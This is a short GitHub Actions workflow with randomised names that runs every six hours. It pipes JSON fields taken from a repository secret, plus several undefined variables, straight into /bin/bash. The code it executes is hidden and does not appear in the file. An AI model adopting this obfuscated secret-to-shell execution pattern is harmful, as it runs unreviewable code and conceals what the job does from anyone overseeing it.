name: jixiaxingliang
on:
  workflow_dispatch:
  schedule:
    - cron: '8 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jixiaxingliang
        env:
          p97937: ${{ secrets.p97937 }}
        run: |
          echo $p97937 | jq -r .jzwz8 | /bin/bash
          echo $e22589 | jq -r .aziz30 | /bin/bash
          echo $phhwn54 | jq -r .ar2 | /bin/bash
          echo $x965 | jq -r .c513 | /bin/bash
          echo $mfxj53 | jq -r .nspcj08058 | /bin/bash

